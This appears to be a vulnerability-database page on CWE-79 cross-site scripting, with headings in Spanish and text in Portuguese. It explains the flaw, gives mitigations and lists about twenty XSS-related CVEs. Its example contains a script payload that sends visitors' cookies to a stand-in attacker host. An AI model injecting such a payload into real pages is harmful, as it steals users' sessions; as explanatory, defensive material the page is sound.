Fallos del tipo CWE-79

28.828 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-34354HIGHStored Cross-site Scripting Vulnerability in Photo StationEPSS 0.6%CVE-2026-64900HIGHMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2026-55126HIGHMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2023-2392LOWNetgear SRX5308 Web Management Interface cross site scriptingEPSS 0.6%CVE-2023-2394LOWNetgear SRX5308 Web Management Interface cross site scriptingEPSS 0.6%CVE-2026-45481HIGHMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2020-3590MEDIUMCisco SD-WAN vManage Software Cross-Site Scripting VulnerabilityEPSS 0.6%CVE-2023-2385LOWNetgear SRX5308 Web Management Interface cross site scriptingEPSS 0.6%CVE-2021-34356HIGHStored XSS Vulnerability in Photo StationEPSS 0.6%CVE-2023-2393LOWNetgear SRX5308 Web Management Interface cross site scriptingEPSS 0.6%CVE-2024-25167MEDIUMCross Site Scripting vulnerability in eblog v1.0 allows a remote attacker to execute arbitrary code via a crafted script to the argument desEPSS 0.6%CVE-2022-0426—Product Feed PRO for WooCommerce < 11.2.3 - Reflected Cross-Site ScriptingEPSS 0.6%CVE-2023-2384LOWNetgear SRX5308 Web Management Interface cross site scriptingEPSS 0.6%CVE-2022-2494MEDIUMCross-site Scripting (XSS) - Stored in openemr/openemrEPSS 0.6%CVE-2022-4663MEDIUMMembers Import <= 1.4.2 - Self Cross-Site ScriptingEPSS 0.6%CVE-2021-43932CRITICALElcomplus SmartPtt Cross-site ScriptingEPSS 0.6%CVE-2022-4979MEDIUMSitecore XP 7.5 - 10.2, CMS 7.2, and Managed Cloud XSSEPSS 0.6%CVE-2024-34081MEDIUMMantisBT Cross-site Scripting vulnerabilityEPSS 0.6%CVE-2026-32121HIGHOpenEMR: Stored DOM XSS via `.html()` in Portal Signer ModalEPSS 0.6%CVE-2023-3081HIGHWP Mail Logging <= 1.11.1 - Unauthenticated Stored Cross-Site Scripting via EmailEPSS 0.6%